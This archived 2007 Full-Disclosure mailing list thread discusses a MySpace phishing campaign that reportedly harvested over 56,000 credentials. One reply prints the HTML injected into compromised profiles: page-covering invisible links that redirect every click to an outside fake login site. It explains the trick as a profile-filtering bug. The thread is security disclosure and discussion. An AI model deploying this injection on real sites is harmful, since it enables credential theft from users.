lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <be950f350701160655u1c4bd520qd85e7d16c13bf662@mail.gmail.com>
Date: Tue, 16 Jan 2007 09:55:51 -0500
From: wac <waldoalvarez00@...il.com>
To: codeshepherd@...il.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Grab a myspace credential

On 1/16/07, Deepan <codeshepherd@...il.com> wrote:
>
> On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
> > "but at some point all this abuse will likely start sending users off
> > to another service. "
> >
> > thats only --if the know if they are being abused.. most of them are
> > not coherent about any such issues..
> >
> >
> >
> > On 1/15/07, Kevin Pawloski <kpawloski@...il.com> wrote:
> >         The level of phishing sites targeting MySpace and bot related
> It is not quiet easy to fool 56000+ users using phishing sites. I wonder
> how Mark is doing it.



Hmm... Oh no is very easy, yes very easy what he is doing. He left some
traces on some of the "cracked" accounts, I was expectig of somebody to
comment earlier since I've been a couple of hours since the initial post.

When you modify a profile you can add this to the data of the profile, you
know those HTML customizations. I found this on one of the accounts that
really got my attention a little bit more than the girl of the account :P

HOLA!!!!<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img
style="border-width:0px;width:2024px; height:1768px;" src="
http://x.myspace.com/images/clear.gif"></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;" href="
http://marcolano.com/login/"><img style="border-width:0px;width:2024px;
height:1768px;" src="http://x.myspace.com/images/clear.gif"></a><embed
allowScriptAccess="never" allowNetworking="internal" enableJSURL="false"
enableHREF="false" saveEmbedTags="true" src="
http://www.../mov/cid_3277_f.mov" width="1" height="1">

As you might see, this creates a huge invisible link in the page in front of
everything, so when you click into anything on the page like a link or
anything it will take you to that phising website so ppl beleive that the
account expired and enter their user+pass. Now I beleive that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still beleive that.

Regards
Waldo


>          activity that has been targeting MySpace lately is pretty
> >         alarming. Granted there is no real financial risk if an
> >         account gets compromised for the user but at some point all
> >         this abuse will likely start sending users off to another
> >         service.
> >
> >         Kevin
> >
> >
> >         On 1/15/07, North, Quinn <QNorth@....com> wrote:
> >                 "youmustbecompleteretards@...ot.com
> :doyouhonestlythinkiwillputmyrealpass
> >                 wordhere"
> >
> >                 ...at least there is some hope left in the world :-\
> >
> >                 --=Q=--
> >
> >                 -----Original Message-----
> >                 From: full-disclosure-bounces@...ts.grok.org.uk
> >                 [mailto:full-disclosure-bounces@...ts.grok.org.uk] On
> >                 Behalf Of Emma
> >                 Perdue
> >                 Sent: Monday, January 15, 2007 7:48 AM
> >                 To: full-disclosure@...ts.grok.org.uk
> >                 Subject: [Full-disclosure] Grab a myspace credential
> >
> >                 56000+ and counting
> >
> >                 http://www.marcolano.com/login/myspace.txt
> >
> >                 --
> >                 *Emma aka TINK*
> >
> >                 _______________________________________________
> >                 Full-Disclosure - We believe in it.
> >                 Charter:
> >                 http://lists.grok.org.uk/full-disclosure-charter.html
> >                 Hosted and sponsored by Secunia - http://secunia.com/
> >
> >                 _______________________________________________
> >                 Full-Disclosure - We believe in it.
> >                 Charter:
> >                 http://lists.grok.org.uk/full-disclosure-charter.html
> >                 Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >         _______________________________________________
> >         Full-Disclosure - We believe in it.
> >         Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >         Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> --
> -----------------------------------------------
> Regards
> Deepan Chakravarthy N
> http://www.codeshepherd.com/
> http://sudoku-solver.net/
>
> I am a programmer by day,
> I dig grave for other programmers by night.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ